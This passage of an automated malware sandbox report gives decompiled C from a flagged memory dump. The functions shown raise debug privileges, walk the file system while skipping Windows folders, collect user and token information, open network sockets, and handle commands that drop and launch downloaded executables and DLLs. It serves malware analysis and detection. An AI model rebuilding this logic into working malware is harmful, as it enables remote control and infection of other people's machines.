                                  0x00403f41
                                  0x00403f4b
                                  0x00403f58
                                  0x00403f5c
                                  0x00403f88
                                  0x00000000
                                  0x00403f8d
                                  0x00403f60
                                  0x00000000
                                  0x00403f60
                                  0x00403ef8
                                  0x00403ee8
                                  0x00403da3
                                  0x00403da9
                                  0x00403ea6
                                  0x00403ea8
                                  0x00000000
                                  0x00403ea8
                                  0x00403db7
                                  0x00403dc4
                                  0x00403dc6
                                  0x00403dcb
                                  0x00403e9d
                                  0x00403e9e
                                  0x00403ea4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403dd1
                                  0x00403dd1
                                  0x00403dd8
                                  0x00000000
                                  0x00000000
                                  0x00403de2
                                  0x00403e12
                                  0x00403e22
                                  0x00403e30
                                  0x00403e36
                                  0x00403e3f
                                  0x00403e44
                                  0x00403e47
                                  0x00403e4a
                                  0x00403e4c
                                  0x00000000
                                  0x00000000
                                  0x00403e63
                                  0x00403e65
                                  0x00403e6a
                                  0x00403e6f
                                  0x00403f64
                                  0x00403f6a
                                  0x00000000
                                  0x00403f71
                                  0x00000000
                                  0x00403e6f
                                  0x00403e26
                                  0x00403e27
                                  0x00403e2e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403e2e
                                  0x00403dea
                                  0x00403df9
                                  0x00000000
                                  0x00000000
                                  0x00403e01
                                  0x00403e10
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403e75
                                  0x00403e7f
                                  0x00403e8c
                                  0x00403e8e
                                  0x00403e97
                                  0x00000000

                                  APIs
                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$FirstNext
                                  • String ID: %s\%s$%s\*$Program Files$Windows
                                  • API String ID: 1690352074-2009209621
                                  • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                  • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                  • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                  • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                                  0x00406512
                                  0x00406514
                                  0x00406522
                                  0x00406524
                                  0x00406530
                                  0x00406534
                                  0x0040653f
                                  0x0040654e
                                  0x00406552
                                  0x0040655a
                                  0x0040655f
                                  0x0040656d
                                  0x00406570
                                  0x00406573
                                  0x0040657a
                                  0x00406589
                                  0x0040658d
                                  0x00406590
                                  0x00406594
                                  0x00000000
                                  0x0040659a
                                  0x004065a1

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 3615134276-2896544425
                                  • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                  • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                  • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                  • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041289A, Relevance: 5.2, Strings: 4, Instructions: 247COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0041289A(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* _t15;
				void* _t22;
				void* _t27;
				signed int _t30;
				void* _t34;
				signed int _t42;
				void* _t76;
				void* _t80;
				signed int _t82;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;

				_push(_t44);
				_push("\r\n\r\n");
				_t2 = E00405EF6(_a4) + 4; // 0x4
				_t40 = _t2;
				_v12 = _t2;
				_t80 = E00402B7C(0x10);
				_t97 = _t96 + 0xc;
				if(_t80 == 0) {
					_t80 = 0;
					__eflags = 0;
				} else {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
				}
				if(_t80 == 0) {
					L48:
					E00402BAB(_a4);
					return 0;
				} else {
					_t15 = E00412870(_t80, _t40, 0xa); // executed
					_t42 = E00412F75(_t15, _t80);
					_v8 = _t42;
					E00402BAB(_t80);
					if(_t42 > 8) {
						_t43 = E00402B7C(0x10);
						if(_t18 == 0) {
							_t43 = 0;
							__eflags = 0;
						} else {
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
						}
						_t21 = E00412F75(E00412F75(E00412870(_t43, _v12, _v8), _t43), _t43);
						_t82 = _t21;
						_v8 = _t21;
						while(_t82 != 0) {
							_t22 = E00412F75(_t21, _t43);
							__eflags = _t22 - 0xffffffff;
							if(_t22 == 0xffffffff) {
								break;
							}
							_t83 = E00412F75(_t22, _t43);
							__eflags = _t83 - 0xffffffff;
							if(_t83 == 0xffffffff) {
								break;
							}
							E00412F75(_t24, _t43);
							_t76 = E00412F8F();
							__eflags = _t83 - 0xa;
							if(__eflags > 0) {
								_t84 = _t83 - 0xe;
								__eflags = _t84;
								if(_t84 == 0) {
									_t21 = E00413B81(0);
									L43:
									L44:
									_t82 = _v8 - 1;
									_v8 = _t82;
									__eflags = _t76;
									if(_t76 != 0) {
										_t21 = E00402BAB(_t76);
									}
									continue;
								}
								_t86 = _t84 - 1;
								__eflags = _t86;
								if(__eflags == 0) {
									_t87 = E004059D8(__eflags, _t76);
									__eflags = _t87;
									if(_t87 == 0) {
										goto L44;
									}
									_t27 = E0040648B(_t76, _t87, 0, 0, L".exe", 0x1a, 0, L"-u");
									_t97 = _t97 + 0x1c;
									__eflags = _t27;
									if(__eflags != 0) {
										E004067C9(_t43, __eflags, 0);
										E00413B81(0);
									}
									L26:
									_t21 = E00402BAB(_t87);
									goto L43;
								}
								_t88 = _t86 - 1;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t76);
									_t30 = E00405EE4();
									_t21 = _t30 * 0x3e8;
									 *0x49fddc = _t30 * 0x3e8;
									goto L43;
								}
								_t89 = _t88 - 1;
								__eflags = _t88 - 1;
								if(__eflags != 0) {
									goto L44;
								}
								E004067C9(_t43, __eflags, _t89);
								_t21 = E00413B81(_t89);
								L19:
								goto L43;
							}
							if(__eflags == 0) {
								_t21 = E00413003(__eflags);
								goto L44;
							}
							_t90 = _t83;
							__eflags = _t90;
							if(__eflags == 0) {
								_t91 = E004059D8(__eflags, _t76);
								__eflags = _t91;
								if(_t91 != 0) {
									E0040648B(_t76, _t91, 0, 0, L".exe", 0x1a, 0, 0);
									_t21 = E00402BAB(_t91);
									_t97 = _t97 + 0x20;
								}
								goto L44;
							}
							_t92 = _t90 - 1;
							__eflags = _t92;
							if(__eflags == 0) {
								_t87 = E004059D8(__eflags, _t76);
								__eflags = _t87;
								if(_t87 == 0) {
									goto L44;
								}
								_push(".");
								_t34 = E00405EFF(_t87);
								__eflags = _t34;
								if(_t34 != 0) {
									L22:
									_push(0);
									_push(1);
									_push(0x1a);
									_push(_t34);
									_push(0);
									_push(0);
									L25:
									_push(_t87);
									E0040648B(_t76);
									_t97 = _t97 + 0x1c;
									goto L26;
								}
								_push(_t34);
								_push(1);
								_push(0x1a);
								_push(L".dll");
								L24:
								_push(_t34);
								_push(_t34);
								goto L25;
							}
							_t93 = _t92 - 1;
							__eflags = _t93;
							if(__eflags == 0) {
								_t87 = E004059D8(__eflags, _t76);
								__eflags = _t87;
								if(_t87 == 0) {
									goto L44;
								}
								_push(".");
								_t34 = E00405EFF(_t87);
								__eflags = _t34;
								if(_t34 == 0) {
									_t34 = 0;
									__eflags = 0;
									_push(0);
									_push(1);
									_push(0x1a);
									_push(L".exe");
									goto L24;
								}
								goto L22;
							}
							_t94 = _t93 - 6;
							__eflags = _t94;
							if(_t94 != 0) {
								goto L44;
							}
							_t95 = E00413C87(_t43, L"hdb", _t94);
							__eflags = _t95;
							if(_t95 == 0) {
								goto L44;
							} else {
								_push(_t95);
								E00403D44();
								_t21 = E00402BAB(_t95);
								goto L19;
							}
						}
						E00402BAB(_t43);
					}
					goto L48;
				}
			}






























                                  0x0041289e
                                  0x004128a2
                                  0x004128b1
                                  0x004128b1
                                  0x004128b4
                                  0x004128bc
                                  0x004128be
                                  0x004128c3
                                  0x004128cf
                                  0x004128cf
                                  0x004128c5
                                  0x004128c9
                                  0x004128ca
                                  0x004128cb
                                  0x004128cc
                                  0x004128cc
                                  0x004128d3
                                  0x00412b1a
                                  0x00412b1d
                                  0x00412b2b
                                  0x004128d9
                                  0x004128de
                                  0x004128ea
                                  0x004128ed
                                  0x004128f0
                                  0x004128f9
                                  0x00412906
                                  0x0041290b
                                  0x00412917
                                  0x00412917
                                  0x0041290d
                                  0x00412911
                                  0x00412912
                                  0x00412913
                                  0x00412914
                                  0x00412914
                                  0x0041292f
                                  0x00412934
                                  0x00412936
                                  0x00412b0b
                                  0x00412940
                                  0x00412945
                                  0x00412948
                                  0x00000000
                                  0x00000000
                                  0x00412955
                                  0x00412957
                                  0x0041295a
                                  0x00000000
                                  0x00000000
                                  0x00412962
                                  0x0041296e
                                  0x00412970
                                  0x00412973
                                  0x00412a7b
                                  0x00412a7b
                                  0x00412a7e
                                  0x00412af3
                                  0x00412af8
                                  0x00412af9
                                  0x00412afc
                                  0x00412afd
                                  0x00412b00
                                  0x00412b02
                                  0x00412b05
                                  0x00412b0a
                                  0x00000000
                                  0x00412b02
                                  0x00412a80
                                  0x00412a80
                                  0x00412a81
                                  0x00412ab3
                                  0x00412ab6
                                  0x00412ab8
                                  0x00000000
                                  0x00000000
                                  0x00412acc
                                  0x00412ad1
                                  0x00412ad4
                                  0x00412ad6
                                  0x00412ade
                                  0x00412ae5
                                  0x00412aeb
                                  0x00412a09
                                  0x00412a0a
                                  0x00000000
                                  0x00412a0a
                                  0x00412a83
                                  0x00412a83
                                  0x00412a84
                                  0x00412a9a
                                  0x00412a9b
                                  0x00412aa0
                                  0x00412aa6
                                  0x00000000
                                  0x00412aa6
                                  0x00412a86
                                  0x00412a86
                                  0x00412a87
                                  0x00000000
                                  0x00000000
                                  0x00412a8a
                                  0x00412a90
                                  0x004129be
                                  0x00000000
                                  0x004129be
                                  0x00412979
                                  0x00412a74
                                  0x00000000
                                  0x00412a74
                                  0x0041297f
                                  0x0041297f
                                  0x00412982
                                  0x00412a48
                                  0x00412a4b
                                  0x00412a4d
                                  0x00412a61
                                  0x00412a67
                                  0x00412a6c
                                  0x00412a6c
                                  0x00000000
                                  0x00412a4d
                                  0x00412988
                                  0x00412988
                                  0x00412989
                                  0x00412a1a
                                  0x00412a1d
                                  0x00412a1f
                                  0x00000000
                                  0x00000000
                                  0x00412a25
                                  0x00412a2b
                                  0x00412a32
                                  0x00412a34
                                  0x004129e6
                                  0x004129e8
                                  0x004129e9
                                  0x004129eb
                                  0x004129ed
                                  0x004129ee
                                  0x004129ef
                                  0x00412a00
                                  0x00412a00
                                  0x00412a01
                                  0x00412a06
                                  0x00000000
                                  0x00412a06
                                  0x00412a36
                                  0x00412a37
                                  0x00412a39
                                  0x00412a3b
                                  0x004129fe
                                  0x004129fe
                                  0x004129ff
                                  0x00000000
                                  0x004129ff
                                  0x0041298f
                                  0x0041298f
                                  0x00412990
                                  0x004129ca
                                  0x004129cd
                                  0x004129cf
                                  0x00000000
                                  0x00000000
                                  0x004129d5
                                  0x004129db
                                  0x004129e2
                                  0x004129e4
                                  0x004129f2
                                  0x004129f2
                                  0x004129f4
                                  0x004129f5
                                  0x004129f7
                                  0x004129f9
                                  0x00000000
                                  0x004129f9
                                  0x00000000
                                  0x004129e4
                                  0x00412992
                                  0x00412992
                                  0x00412995
                                  0x00000000
                                  0x00000000
                                  0x004129a6
                                  0x004129aa
                                  0x004129ac
                                  0x00000000
                                  0x004129b2
                                  0x004129b2
                                  0x004129b3
                                  0x004129b9
                                  0x00000000
                                  0x004129b9
                                  0x004129ac
                                  0x00412b14
                                  0x00412b19
                                  0x00000000
                                  0x004128f9

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateFree
                                  • String ID: $.dll$.exe$hdb
                                  • API String ID: 576844849-2025675902
                                  • Opcode ID: 91d734af9a23ec44f2541a9f1e7fc2d4456d666c8a1ab295d144aebfed0d9c46
                                  • Instruction ID: 70dff955ffdbf613c1a4fa08e3d1fc98b678eebc215b8ce7432258245e9d9c55
                                  • Opcode Fuzzy Hash: 91d734af9a23ec44f2541a9f1e7fc2d4456d666c8a1ab295d144aebfed0d9c46
                                  • Instruction Fuzzy Hash: DE51D472A056213AE7257A754E42FFF61589F51BA4F10013FF801F62C2EDEC4DA211AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                                  0x00402b8c
                                  0x00402b92
                                  0x00402b96
                                  0x00402b9e
                                  0x00402ba3
                                  0x00402baa

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                  • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                  • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                  • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                                  0x00406077
                                  0x00406082
                                  0x00406085

                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: NameUser
                                  • String ID:
                                  • API String ID: 2645101109-0
                                  • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                  • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                  • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                  • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                  • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                  • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                  • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                                  0x004061c3
                                  0x004061cb
                                  0x004061cd
                                  0x004061d0
                                  0x004061de
                                  0x004061e0
                                  0x004061e5
                                  0x004061e9
                                  0x004061eb
                                  0x004061ed
                                  0x004061f2
                                  0x0040622a
                                  0x00406230
                                  0x00406235
                                  0x00406239
                                  0x0040623b
                                  0x00406244
                                  0x00406249
                                  0x00406249
                                  0x0040624c
                                  0x00406253
                                  0x00406256
                                  0x00406258
                                  0x00406261
                                  0x00406266
                                  0x00406266
                                  0x00406270
                                  0x00406273
                                  0x00406276
                                  0x0040627b
                                  0x0040627e
                                  0x0040628c
                                  0x0040628e
                                  0x00406290
                                  0x00406295
                                  0x0040629a
                                  0x0040629e
                                  0x004062a0
                                  0x004062ac
                                  0x004062af
                                  0x004062b7
                                  0x004062b9
                                  0x004062c9
                                  0x004062e0
                                  0x004062e2
                                  0x004062e4
                                  0x004062f3
                                  0x004062f3
                                  0x004062e4
                                  0x004062f8
                                  0x004062fd
                                  0x004062a0
                                  0x004062fe
                                  0x00406302
                                  0x00406307
                                  0x0040630c
                                  0x0040630d
                                  0x0040630f
                                  0x00406312
                                  0x00406317
                                  0x00406318
                                  0x0040631c
                                  0x0040631e
                                  0x00406321
                                  0x00406326
                                  0x00000000
                                  0x00406327
                                  0x004061f4
                                  0x004061ff
                                  0x00406208
                                  0x00406218
                                  0x0040621d
                                  0x00406224
                                  0x00406226
                                  0x00406228
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406228
                                  0x00406201
                                  0x00000000

                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                  • _wmemset.LIBCMT ref: 00406244
                                  • _wmemset.LIBCMT ref: 00406261
                                  • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: _wmemset$ErrorInformationLastToken
                                  • String ID: IDA$IDA
                                  • API String ID: 487585393-2020647798
                                  • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                  • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                  • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                  • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                                  0x00404e1d
                                  0x00404e26
                                  0x00404e2a
                                  0x00404e2f
                                  0x00404e37
                                  0x00404e3a
                                  0x00404e45
                                  0x00404e4f
                                  0x00404e57
                                  0x00404e61
                                  0x00404e66
                                  0x00404e68
                                  0x00404e6c
                                  0x00404e6e
                                  0x00404e7a
                                  0x00404e80
                                  0x00404e84
                                  0x00404e9f
                                  0x00404ea7
                                  0x00404eab
                                  0x00404eb1
                                  0x00404eb1
                                  0x00404eb6
                                  0x00404ebe
                                  0x00404ecb
                                  0x00000000
                                  0x00404ec0
                                  0x00404ec1
                                  0x00404ec7
                                  0x00404ec7
                                  0x00404ecd
                                  0x00000000
                                  0x00404ece
                                  0x00404ebe
                                  0x00404e87
                                  0x00404e90
                                  0x00000000
                                  0x00404e90
                                  0x00000000

                                  APIs
                                  • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                  • socket.WS2_32(?,?,?), ref: 00404E7A
                                  • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: freeaddrinfogetaddrinfosocket
                                  • String ID:
                                  • API String ID: 2479546573-0
                                  • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                  • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                  • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                  • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
